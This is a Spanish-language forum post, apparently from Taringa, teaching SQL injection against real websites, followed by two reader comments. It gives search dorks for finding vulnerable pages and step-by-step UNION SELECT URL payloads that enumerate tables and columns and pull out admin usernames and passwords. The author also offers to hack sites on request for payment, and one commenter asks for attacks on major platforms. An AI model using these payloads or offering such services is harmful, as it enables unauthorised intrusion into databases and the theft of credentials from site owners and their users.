Inyección SQL

Hola,
He creado este post para explicaros como funciona el metodo de hackeo inyección SQL y más abajo pondré los scan una web que acabo de hackear.
Inyección SQL
Inyección SQL es un metodo mediante el cual conseguimos acceder a la base de datos de una web determinada.Este metodo es muy famoso ya que mediante este metodo hackearon facebook durante unas horas.
Ejemplo web - Funcionamiento
Os voy a enseñar como hackear una web, en mi caso he escogido una al azar, tiene que ser vulnerable, para encontrar una página en google puedes poner:"allinurl:noticias?id=" o "allinurl:news?id=", sin las comillas, solo lo de dentro, y te apareceran muchas, no todas vulnerables, para probar si son vulnerables entra en la web y acabara en ?id=numero , cambia el numero por -, y si te sale esto, es decir, un error de la base de datos:
Inyección SQL
Si la encuentras procedemos al hackeo:
1. Introduce en la barra de donde pondra: http://webahackear.loquesea/loquesea.php?id=-1+UNION+SELECT+1--(si no sabes donde mira la foto de aqui debajo) y carga la página, luego cambialo por -1+UNION+SELECT+1,2-- y carga la página, asi sucesivamente hasta que en vez de aparecer el error salgan unos números o un numero:
web
hack
Sustituyes los números o el número por "group_concat(table_name)" y añades entre el último número y el -- "+from+information_schema.tables" todo sin comillas.
Ahora te saldrán todas las tablas, será algo como:
CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLU...
Las de más adelante serán las que sirven, busca algo relacionado con admin o usuarios para encontrar los passwords, cuando le encontréis vais a:http://easycalculation.com/ascii-hex.php y en el campo que pone:"Convert String to ascii or hexa or binary :" ponéis el nombre de la tabla, ejemplo: "cc_admin" (sin comillas), y en el campo de debajo saldra un código le copias, y ahora en la otra web mira la tabla que habías elegido y fijate que número era el que estaba antes ahi, y ahora arriba, habías sustituido los números por group_concat(table_name), ahora solo deja asi el del numero en el que estaba la tabla los demás dejalos como estaban antes y modifica el final del url asi:
+from+information_schema.columns+where+table_name=char(Aqui pon el codigo que copiaste antes, pero ojo, borra los espacios y pon comas)--
cambia group_concat(table_name) por group_concat(column_name)
Si lo haces bien pulsa intro y te saldran las columnas parecido a mi:
admin_647_id,admin_647_name,admin_647_pass,admin_647_type
Eso copialo y dejalo en un documento de texto por un rato ahora vuelve a modificar el final por este:
+from+nombredelatabla
nombredelatabla es el nombre que tendría la tabla.
y en group_concat(table_name) hay que sustituir por concat_ws(char(58),aquipegaloquedejasteendocumentotexto)
Si no entendéis algo preguntad, no hay problema.
Hackeo la webs que me pidáis, dependiendo de lo que tarde varía el precio, si tardo poco te doy los datos gratis(no hackeo facebook.com, ni google.com xD) mi email es Hackswebs@hotmail.com, también arreglo webs, aunque no prometo nada.
Si recibo muchos emails, haré un formulario de contacto.
Saludos y gracias por leerme.

2 comentarios - Inyección SQL

@Dracoelcapo123 +2
hackeame a:
taringa.net
facebook.com
twitter.com
fotolog.com

y tedoy 4.000 Euros! ok?enviame mp xD
Jodaaa
@skorchhh +1
excelente post
pero sabes es más fácil si usas havij
jajaja en fin ya mejor dejo de hablar.